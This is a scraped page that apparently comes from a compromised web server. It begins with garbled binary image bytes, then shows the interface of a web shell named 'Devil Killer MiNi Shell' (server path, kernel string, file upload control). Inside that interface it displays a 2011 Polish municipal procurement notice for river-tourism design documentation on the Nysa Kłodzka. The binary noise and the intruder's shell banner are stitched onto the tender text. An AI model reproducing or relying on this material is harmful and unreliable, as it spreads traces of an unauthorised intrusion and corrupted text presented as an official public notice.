JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110407/69732-N-2011.html

<p class="kh_header"><b>Bystrzyca Kłodzka: opracowanie:
1.inwentaryzacji koryta rzeki Nysy Kłodzkiej  wraz z inwentaryzacją nadbrzeża rzeki, 2. oceny i raportu oddziaływania na środowisko, w tym uzyskanie decyzji o uwarunkowaniach środowiskowych, 3. pełnej dokumentacji projektowo - kosztorysowej oraz wykonawczej, 4.operatu wodnoprawnego na wykonanie zagospodarowania rzeki dla turystyki wodnej oraz uzyskanie pozwoleń wodnoprawnych i wymaganych do rozpoczęcia inwestycji decyzji, 
dla zadania: Otwarcie Nysy Kłodzkiej dla polsko - czeskiej turystyki wodnej -  I etap: opracowanie dokumentacji.</b><br>
<b>Numer ogłoszenia: 69732 - 2011; data zamieszczenia: 07.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bystrzyca Kłodzka , ul. Henryka Sienkiewicza 6, 57-500 Bystrzyca Kłodzka, woj. dolnośląskie, tel. 074 8117600, faks 074 8111588.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bystrzycaklodzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie:
1.inwentaryzacji koryta rzeki Nysy Kłodzkiej  wraz z inwentaryzacją nadbrzeża rzeki, 2. oceny i raportu oddziaływania na środowisko, w tym uzyskanie decyzji o uwarunkowaniach środowiskowych, 3. pełnej dokumentacji projektowo - kosztorysowej oraz wykonawczej, 4.operatu wodnoprawnego na wykonanie zagospodarowania rzeki dla turystyki wodnej oraz uzyskanie pozwoleń wodnoprawnych i wymaganych do rozpoczęcia inwestycji decyzji, 
dla zadania: Otwarcie Nysy Kłodzkiej dla polsko - czeskiej turystyki wodnej -  I etap: opracowanie dokumentacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji:
1. inwentaryzacji koryta rzeki Nysy Kłodzkiej  wraz z inwentaryzacją nadbrzeża rzeki, w zakresie potrzeb inwestycyjnych dla turystyki wodnej, na odcinku przebiegającym przez Gminę Bystrzyca Kłodzka od miejscowości Długopole Dolne do granicy z Gminą Kłodzko, ze wstępną koncepcją zagospodarowania rzeki: 
- opis koryta rzeki i jej nadbrzeża, w tym  dane o własności gruntów w obszarze planowanej infrastruktury dla turystyki wodnej, 
-  rozpoznanie i opisanie  potrzeb inwestycyjnych (robót budowlanych i porządkowych) dot. zagospodarowania i utworzenia na Nysie Kłodzkiej szlaku wodnego,
- zaznaczenie i opis  istotnych dla bezpieczeństwa miejsc jak: zakola, progi, głazy, wartki nurt   i inne, 
- wstępną koncepcję zagospodarowania i oznakowania planowanego do wytyczenia szlaku wodnego,
 2. oceny i raportu oddziaływania na środowisko, w tym uzyskanie decyzji  o środowiskowych  uwarunkowaniach dla  przedmiotowego  przedsięwzięcia wraz  z  opracowaniem, złożeniem i procedowaniem wniosku i  wszelkich niezbędnych załączników: 
- sporządzenie wytycznych w zakresie postępowania w sprawie oceny  na środowisko dla przedsięwzięć współfinansowanych z krajowych  lub regionalnych  programów operacyjnych, 
- uzyskanie decyzji o środowiskowych uwarunkowaniach dla  przedmiotowego  przedsięwzięcia wraz z  opracowaniem, złożeniem i procedowaniem wniosku i  wszelkich niezbędnych załączników  (takich jak np.:  karta informacyjna projektu,  wniosek, raport oddziaływania na środowisko, raport Natura 2000 i innych uzgodnień)  koniecznych do  uzyskania w toku procedury, 
- w  razie zaistnienia konieczności - przeprowadzenie pełnej inwentaryzacji  przyrodniczej obejmującej wpływy na cele i przedmiot ochrony obszarów Natura 2000, lub uzyskanie zaświadczenia o braku takiej konieczności.
3. pełnej dokumentacji projektowo - kosztorysowej oraz wykonawcza w zakresie  prac budowlanych  i porządkowych oraz w zakresie oznakowania, instalacji i promocji szlaku wodnego, wraz z niezbędnymi uzgodnieniami i pozwoleniami. 
W skład dokumentacji  projektowo - kosztorysowej oraz wykonawczej i materiałów przetargowych wchodzą w szczególności: 
mapy:
- mapy do celów projektowych, opiniodawczych, w skali 1 : 500 lub 1 : 1000 z zaznaczonym terenem przeznaczonym  do użytkowania i obliczoną powierzchnią zajęcia, 
- mapy poglądowe w skali 1 : 10 000 z naniesioną lokalizacją szlaku wodnego i planowanej do realizacji infrastruktury turystycznej (przystanie, przenioski, inne) i mapy  sytuacyjno - wysokościowe z naniesioną powierzchnią zajęć, 
- mapy ewidencyjne (z naniesionymi urządzeniami) i wypisy z rejestru gruntów w skali                    1 : 2000 i 1: 5000;
opracowania, projekty:
-  szczegółowe opisanie rzeki i jej nadbrzeża, w zakresie potrzeb inwestycyjnych dla turystyki wodnej, w tym  dane o własności gruntów, dane dotyczące długości poszczególnych odcinków rzeki, łącznej długości planowanego szlaku, szerokości koryta na istotnych pod kątem turystyki wodnej odcinkach oraz głębokości koryta, informacja o istniejących obiektach hydrotechnicznych ( forma opisowa i fotograficzna),
- wykaz prac na poszczególnych odcinkach rzeki wraz z ich szczegółowym opisem, niezbędnych do przeprowadzenia  w ramach zagospodarowania Nysy Kłodzkiej pod turystykę wodną oraz zlokalizowanie i opisanie ich na załączniku mapowym, 
- projekt zagospodarowania i oznakowania planowanego szlaku wodnego, w tym wyznaczenie lokalizacji infrastruktury turystycznej (m.in.  przystanie, przepławki, zejścia do wody, wodowskazy, przenioski, umocnienia nadbrzeża, tablice ostrzegawcze i informacyjne) i miejsc służących obsłudze turystyki wodnej wraz z naniesieniem ich i opisaniem na załączniku mapowym,
- projekt architektoniczny, który powinien zawierać charakterystyczne widoki, rzuty, przekroje proponowanych rozwiązań zagospodarowania terenu, poszczególnych elementów architektonicznych (np. zejść do rzeki, przystani, przeniosek) zagospodarowania rzeki dla turystyki wodnej, 
- projekty budowlane i projekty wykonawcze dla wszystkich branż,
- projekty oznakowania i promocji szlaku wodnego, 
- założenia do planu bezpieczeństwa,
- wizualizację szlaku wodnego, jego zagospodarowania, oznakowania i promocji, 
- harmonogram rzeczowo - finansowy realizacji inwestycji, z rozbiciem realizacji inwestycji na etapy;
przygotowania materiałów niezbędnych do przeprowadzenia przetargu na realizację  wymienionego  zadania inwestycyjnego, w tym: 
a) zestawienie kosztów realizacji, w tym: 
- kosztorysy inwestorskie dla poszczególnych branż, 
-  przedmiary robót, 
-  kosztorysy ślepe (ofertowe), 
b) specyfikację techniczną wykonania i odbioru  robot;
c) specyfikację istotnych warunków zamówienia dla przetargu na wykonanie robót budowlanych,
uzyskania  niezbędnych  uzgodnień i pozwoleń, w tym służb konserwatorskich oraz złożenie  kompletnych wniosków na uzyskanie:
- decyzji Lokalizacji Celu Publicznego,
- decyzji pozwolenia na budowę, 
- uzyskanie uzgodnień ZUD,
- uzyskanie  opinii i uzgodnień zarządców i użytkowników obszaru, na którym realizowane będą inwestycje, zarządców występujących w obszarze sieci przemysłowych,  
-  pozwoleń Wojewódzkiego Konserwatora Zabytków,  w zakresie obszaru znajdującego się w strefie K - ochrona krajobrazu, 
- innych niezbędnych uzgodnień i pozwoleń, kończących się uzyskaniem prawa do realizacji inwestycji.

W ramach  przedmiotu zamówienia wykonawca ma obowiązek pełnienia nadzoru autorskiego nad realizacją robót objętych  dokumentacją projektową. 

4. operatu  wodnoprawnego na wykonanie zagospodarowania rzeki dla turystyki wodnej oraz uzyskanie pozwoleń wodnoprawnych i wymaganych do rozpoczęcia inwestycji decyzji:
- stworzenie podstaw prawnych do uzyskania pozwolenia wodno-prawnego na zagospodarowanie Nysy Kłodzkiej, na określonym w zapytaniu odcinku, pod turystykę wodną,
- uzyskanie decyzji pozwolenia wodnoprawnego na realizację inwestycji.

Wykonawca zobowiązany jest do przygotowania  kompletnej dokumentacji technicznej, uzyskania w imieniu Zamawiającego niezbędnych pozwoleń, uzgodnień, decyzji oraz  złożenia kompletnego wniosku w celu uzyskania pozwolenia na budowę wynikających z ustawy Prawo Budowlane oraz niezbędnych pozwoleń, uzgodnień i decyzji od Wojewódzkiego Konserwatora Zabytków,  a także przygotowania dokumentacji  i wniosków, w imieniu Zamawiającego, w zakresie: 
1/ Decyzji o warunkach zabudowy, 
2/ Decyzji Lokalizacji Celu Publicznego,
3/ Decyzji  o uwarunkowaniach środowiskowych,
4/ Decyzji Pozwolenia na budowę,
5/ Decyzji Pozwolenia wodnoprawnego.

Na Wykonawcy ciąży obowiązek uzyskania niezbędnych map i wszystkich pozostałych materiałów, uzgodnień, opinii i sprawdzeń rozwiązań projektowych w zakresie  wynikającym z przepisów, niezbędnych do wykonania dokumentacji.  

Wykonawca zobowiązuje się do przekazania  części materiałów, niezbędnych do przeprowadzenia działań informacyjno - promocyjnych i wykonania prospektu promocyjnego  Zamawiającemu w terminie do  30.09.2011 r. (dotyczy: map, opisów, wizualizacji, projektów oznakowań i projektu wytyczenia szlaku wodnego, fotografii, innych)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.00.00-2, 71.24.20.00-6, 71.32.00.00-7, 71.22.00.00-6, 71.20.00.00-0, 71.24.00.00-2, 71.42.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia tego warunku Wykonawca musi załączyć do oferty: - aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach. Nie załączenie w/w dokumentu, w przypadku jeżeli odrębne przepisy wymagają wpisu do rejestru, będzie skutkowało odrzuceniem oferty lub wykluczeniem wykonawcy z postępowania i jednoczesnym odrzuceniem oferty, z zastrzeżeniem art. 26 ust. 3 P.z.p. Jeżeli wybrany Wykonawca będzie osobą fizyczną, to przed podpisaniem umowy o wykonanie przedmiotu zamówienia, Zamawiający zażąda od niego przedłożenia kserokopii, potwierdzonej za zgodność z oryginałem, zaświadczenia o wpisie do ewidencji działalności gospodarczej, aktualnego na dzień składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania wiedzy i doświadczenia do wykonania zamówienia do oferty dołączyć należy: 
- wykaz wykonanych usług, z wykorzystaniem wzoru załącznika nr 6 do SIWZ,  w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli  okres  działalności jest krótszy -    w tym okresie, co najmniej  2 zamówień na opracowanie -  co najmniej dwóch projektów budowlano - wykonawczych z podobnego  zakresu do przedmiotu zamówienia  z uzyskaniem wymaganych zezwoleń i zakończonych pozwoleniem na budowę dla budowy lub przebudowy obiektów użyteczności publicznej,  przeznaczonej pod działalność  turystyczną lub sportowo - rekreacyjną,  przy czym  minimalna wartość każdej z tej usługi musi wynosić  50 000 zł. brutto.,    z podaniem ich wartości, zakresu opracowań, przedmiotu, dat wykonania i odbioru oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonane należycie. 
Niniejsze usługi projektowe muszą polegać na wykonaniu: 1/ opracowania dokumentacji projektowo - wykonawczej i kosztorysowej na zagospodarowanie terenów zielonych,  terenów pod turystykę lub pod turystykę wodną, i  2/ wykonanie operatu wodnoprawnego z uzyskaniem pełnoprawnej decyzji pozwolenia wodnoprawnego i 3/wykonanie oceny i sporządzenie raportu oddziaływania na środowisko, w tym uzyskanie decyzji o środowiskowych  uwarunkowaniach.
Należy dołączyć dokumenty potwierdzające, że wymienione usługi zostały wykonane  z należytą starannością (min. 2 szt. referencji dla każdego rodzaju usług ( określonych w pkt. od 1 do 3 jw) lub 2 szt. referencji dla usług zawierających pełny zakres opracowania jak  w pkt. 1/,2/,3/). 
Referencje winny być podpisane przez  Inwestora/Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia Wykonawcy warunków udziału w postępowaniu w zakresie potencjału technicznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz  doświadczenie i potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia,  do  oferty dołączyć należy: 
1)  wykaz osób, z wykorzystaniem wzoru załącznika nr 7 do SIWZ, które będą uczestniczyć  w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz  z informacjami i oświadczeniem na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nie czynności oraz  informacją o podstawie do dysponowania tymi osobami - co najmniej po jednej osobie posiadającej uprawnienia budowlane do projektowania  bez ograniczeń  oraz przynależącej do właściwej izby samorządu zawodowego, w specjalnościach : 
- architekt krajobrazu lub w specjalności architektonicznej -  min. 1 osoba,
- konstrukcyjno - budowlanej - min. 1 osoba,
- gospodarki wodnej  - min. 1 osoba, 
- ochrony środowiska - min. 1 osoba.

2) oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli  ustawa nakłada obowiązek posiadania takich uprawnień. 

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg, formuły   (spełnia, nie spełnia), w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. 
Przed podpisaniem umowy Zamawiający zażąda przedłożenia uprawnień i zaświadczeń, potwierdzonych za zgodność z oryginałem, o  posiadanych uprawnieniach i o przynależności do właściwej izby samorządu zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia Wykonawcom warunków udziału w postępowaniu w zakresie sytuacji ekonomicznej i finansowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenie złożone na podstawie art. 44 ustawy P.z.p., że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy P.z.p., 2) parafowany na każdej stronie przez Wykonawcę wzór umowy, stanowiący Załącznik Nr 3 do SIWZ,                            3) pełnomocnictwo/ upoważnienie dla osoby uprawnionej do podpisania oferty,   w przypadku, gdy umocowanie do reprezentowania Wykonawcy nie wynika ze stosownego dokumentu, a w szczególności z odpisu z właściwego rejestru - wzór upoważnienia stanowi Załącznik Nr 5 do SIWZ, 4) pisemne zobowiązanie podmiotów, o których mowa w art. 26 ust. 2b ustawy P.z.p. , do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Warunki zmiany terminu wykonania zamówienia:
a) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego, jeżeli te zmiany są korzystne dla Zamawiającego,
b) z powodów niezależnych od Zamawiającego i Wykonawcy spowodowanych przewlekłością postępowania o uzyskanie od instytucji  i urzędów pozwoleń, decyzji, uzgodnień niezbędnych do realizacji przedmiotu umowy, 
c) z powodu wystąpienia okoliczności powodujących konieczność zmiany osób, które będą uczestniczyć w wykonaniu przedmiotu  zamówienia,  na osoby o co najmniej równoważnych kwalifikacjach i doświadczeniu.

2. Warunki zmiany zakresu wykonania zamówienia:
Zamawiający może udzielić zamówienia z wolnej ręki jeżeli zachodzą przesłanki określone w art. 67 pkt. 5ustawy P. z.p.

